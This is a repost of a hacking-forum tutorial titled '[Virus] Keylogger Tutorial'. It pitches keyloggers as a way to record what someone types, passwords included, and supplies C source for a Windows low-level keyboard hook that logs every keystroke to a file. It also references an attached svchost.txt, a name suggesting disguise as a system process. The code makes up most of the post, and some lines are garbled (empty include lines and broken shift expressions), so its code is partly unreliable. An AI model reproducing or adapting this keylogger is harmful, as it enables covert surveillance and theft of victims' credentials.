Trao đổi với tôi

http://www.buidao.com

4/15/10

[Virus] Keylogger Tutorial

what is a keylogger?

it's a program that logs everything that you type on the keyboard.

what are it's usages to me?

well, if you want to record everytyhing someone types then you can then see anything you want like passwords and such.

how do i get one?

you can buy some corperate or home usage ones that are made for recording what employees are doing or what your kids are doing. that is a bad method though since they are bloated, cost money since most people don't know how to find warez and it's better to make your own since you can make it do what you want to do.

ok, how do i do this?

you program one. if your new to programming then learn how to program in c then come back here. if you know how to program in c then read on.

there are two ways of making a keylogger:

1. using the GetAsyncKeyState API. look at svchost.c.

2. Using the SetWindowsHookEx API. This is the prefered method but only works on NT based systems. The reason this way is prefered is because it is much more efficient that GetAsyncKeyState. See for yourself. No need to check if what character is being pressed and no need to check other stuff like the value -32767 is being returned. Look here about this. When you use the SetWindowsHookApi you "hook" the keyboard to that you can send all of the keys prssed to somewhere. When making a keylogger you usually send it to a file so that all of the keys will be logged there. The only disavantage of using this API if you could even call it a disadvantage is that you have to use have a DLL as well as your .exe file. I found a peice of code that doesn't need a DLL. Here it is with a slight modification from me so that you don't have to have the keylogger close before you can view the file with the logged keys in it:

CODE C Language
001// This code will only work if you have Windows NT or
002// any later version installed, 2k and XP will work.
003
004
005#define _WIN32_WINNT 0x0400
006
007#include
008#include
009#include
010
011// Global Hook handle
012HHOOK hKeyHook;
013
014
015
016// This is the function that is "exported" from the
017// execuatable like any function is exported from a
018// DLL. It is the hook handler routine for low level
019// keyboard events.
020
021__declspec(dllexport) LRESULT CALLBACK KeyEvent (
022
023 int nCode, // The hook code
024 WPARAM wParam, // The window message (WM_KEYUP, WM_KEYDOWN, etc.)
025 LPARAM lParam // A pointer to a struct with information about the pressed key
026
027) {
028 if ((nCode == HC_ACTION) && // HC_ACTION means we may process this event
029 ((wParam == WM_SYSKEYDOWN) || // Only react if either a system key ...
030 (wParam == WM_KEYDOWN))) // ... or a normal key have been pressed.
031 {
032
033 // This struct contains various information about
034 // the pressed key such as hardware scan code, virtual
035 // key code and further flags.
036
037 KBDLLHOOKSTRUCT hooked =
038 *((KBDLLHOOKSTRUCT*)lParam);
039
040
041 // dwMsg shall contain the information that would be stored
042 // in the usual lParam argument of a WM_KEYDOWN message.
043 // All information like hardware scan code and other flags
044 // are stored within one double word at different bit offsets.
045 // Refer to MSDN for further information:
046 //
048 // windowsuserinterface/userinput/keyboardinput/aboutkeyboardinput.asp
049 //
050 // (Keystroke Messages)
051
052
053 DWORD dwMsg = 1;
054 dwMsg += hooked.scanCode <<>
055 dwMsg += hooked.flags <<>
056
057
058 // Call the GetKeyNameText() function to get the language-dependant
059 // name of the pressed key. This function should return the name
060 // of the pressed key in your language, aka the language used on
061 // the system.
062
063 char lpszName[0x100] = {0};
064 lpszName[0] = '[';
065
066 int i = GetKeyNameText(dwMsg,
067 (lpszName+1),0xFF) + 1;
068
069 lpszName[i] = ']';
070
071
072 // Print this name to the standard console output device.
073
074 FILE *file;
075 file=fopen("keys.log","a+");
076 fputs(lpszName,file);
077 fflush(file);
078 }
079
080
081// the return value of the CallNextHookEx routine is always
082// returned by your HookProc routine. This allows other
083// applications to install and handle the same hook as well.
084
085 return CallNextHookEx(hKeyHook,
086 nCode,wParam,lParam);
087
088}
089
090
091
092// This is a simple message loop that will be used
093// to block while we are logging keys. It does not
094// perform any real task ...
095
096void MsgLoop()
097{
098 MSG message;
099 while (GetMessage(&message,NULL,0,0)) {
100 TranslateMessage( &message );
101 DispatchMessage( &message );
102 }
103}
104
105
106// This thread is started by the main routine to install
107// the low level keyboard hook and start the message loop
108// to loop forever while waiting for keyboard events.
109
110DWORD WINAPI KeyLogger(LPVOID lpParameter)
111{
112
113// Get a module handle to our own executable. Usually,
114// the return value of GetModuleHandle(NULL) should be
115// a valid handle to the current application instance,
116// but if it fails we will also try to actually load
117// ourself as a library. The thread's parameter is the
118// first command line argument which is the path to our
119// executable.
120
121 HINSTANCE hExe = GetModuleHandle(NULL);
122 if (!hExe) hExe = LoadLibrary((LPCSTR) lpParameter);
123
124// Everything failed, we can't install the hook ... this
125// never happened, but error handling is important.
126
127 if (!hExe) return 1;
128
129
130
131 hKeyHook = SetWindowsHookEx ( // install the hook:
132
133 WH_KEYBOARD_LL, // as a low level keyboard hook
134 (HOOKPROC) KeyEvent, // with the KeyEvent function from this executable
135 hExe, // and the module handle to our own executable
136 NULL // and finally, the hook should monitor all threads.
137 );
138
139
140// Loop forever in a message loop and if the loop
141// stops some time, unhook the hook. I could have
142// added a signal handler for ctrl-c that unhooks
143// the hook once the application is terminated by
144// the user, but I was too lazy.
145
146 MsgLoop();
147 UnhookWindowsHookEx(hKeyHook);
148 return 0;
149}
150
151
152// The main function just starts the thread that
153// installs the keyboard hook and waits until it
154// terminates.
155
156int main(int argc, char** argv)
157{
158 HANDLE hThread;
159 DWORD dwThread;
160 DWORD exThread;
161
162 hThread = CreateThread(NULL,NULL,(LPTHREAD_START_ROUTINE)
163 KeyLogger, (LPVOID) argv[0], NULL, &dwThread);
164
165 if (hThread) {
166 return WaitForSingleObject(hThread,INFINITE);
167 } else {
168 return 1;
169 }
170}


if anyone has any questions on this feel free to post them here.

enjoy.

Attached File svchost.txt (11.8K)

reflink: http://www.rohitab.com/discuss/index.php?showtopic=19360&st=20